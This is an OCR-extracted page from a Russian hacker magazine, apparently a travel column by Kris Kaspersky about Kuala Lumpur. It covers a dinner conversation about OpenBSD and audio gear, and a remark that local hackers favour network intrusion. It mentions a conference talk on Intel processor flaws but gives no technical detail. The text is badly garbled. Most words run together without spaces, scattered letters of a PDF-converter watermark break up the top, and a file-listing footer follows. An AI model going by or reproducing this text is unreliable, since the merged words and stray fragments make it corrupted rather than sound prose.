Пестрые краски Куала-Лумпур

Она вооружена, но совсем не опасна

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Мыщъхсиделстремя, причемдвеизнихзамужем. Одна— эмигрантка изАмерики, остальные— коренныеизраильтянки. Всеобразованные иначитанные, умныедоневозможности. Ивотсидиммы, значит, вресторанеподоткрытымнебом. Наулицеужезима, ночь. Слегкапрохладно, ноещенехолодно. Мимонасидутлюди, амыпьемпиво(ну, этоона пьетпиво, амыщъх— вишневыйсок) иобсуждаемOpenBSD, ламповые усилителиHiFi-класса, критикуябеспроводныеколонкиипрочую потребительскуюмуть. Оказывается, унеетроедетей, онаученыйи большоймеломан. Ассемблер— этотак, невинноехобби.

АТАКИСЛЕДУЮТ НЕПРЕРЫВНО

Чтокасаетсяхакеров, товМалайзиионитоженаличествуют, причем практическивсезамыкаютсянасетевойбезопасности, дизассемблированиемздесьниктонезанимается— наHIEW смотрятсудивлением, аИДУзнаютнауровненоворожденноймыши. Затовсетяхшарятчисто конкретно, новосновном— всторонувзлома, аневоздвижения. Тут дажевстолицеинтернеттормозиттак, какнетормозитуменядомав деревне. ЕстькучаместсбесплатнымWi-Fi, чтосущественноупрощает сетевыеатакииобкаткуновыхтехнологийвзломаизащитыотнападения.

076

Атакиследуютнепрерывно, такчтолучшегоместадлятестирования системобнаруженияипредотвращениявторжений, пожалуй, ненайти. Не могу умолчать о том, что в октябре прошлого года здесь проводилась конференция HITB (Hack In The Box), посвященная различным аспектам информационной безопасности. На ней я представил доклад о найденных мной недоработках в процессорах Intel, которые позволяют использовать уязвимости как непосредственно сидя за компом, так и удаленно, вне зависимости от операционной системы, установленных обновлений и приложений. Но это уже тема для отдельной статьи…

P.S.

From: Kris Kaspersky

To: andrushock@real.xakep.ru

Subject: Re[16]: статьи в следующий номер

Доброговременисуток!

ТолькочтовернулсяизМалайзии. Усталжутко. Долетелиначестном словеиодномкрыле. Одинсегменткрылаотсутствовал;-( ахренеть. Никогдабынеповерил, еслибыневиделэтосвоимиглазами. z

XÀÊÅÐ 06 /126/ 09

<<< < Предыдущая 1 2 3 4 5 6 78 / 158 9 10 11 12 13 14 15 > Следующая >>>

Соседние файлы в папке журнал хакер

#
20.04.202447.9 Mб11121_Optimized.pdf
#
20.04.202449.28 Mб11122_Optimized.pdf
#
20.04.202422.66 Mб11123_Optimized.pdf
#
20.04.202414.76 Mб11124_Optimized.pdf
#
20.04.202411.92 Mб11125_Optimized.pdf
#
20.04.202412.83 Mб11126_Optimized.pdf
#
20.04.202416.73 Mб11127_Optimized.pdf
#
20.04.202416.61 Mб11128_Optimized.pdf
#
20.04.202415.04 Mб11129_Optimized.pdf
#
20.04.202417.96 Mб11130_Optimized.pdf
#
20.04.202417.2 Mб11131_Optimized.pdf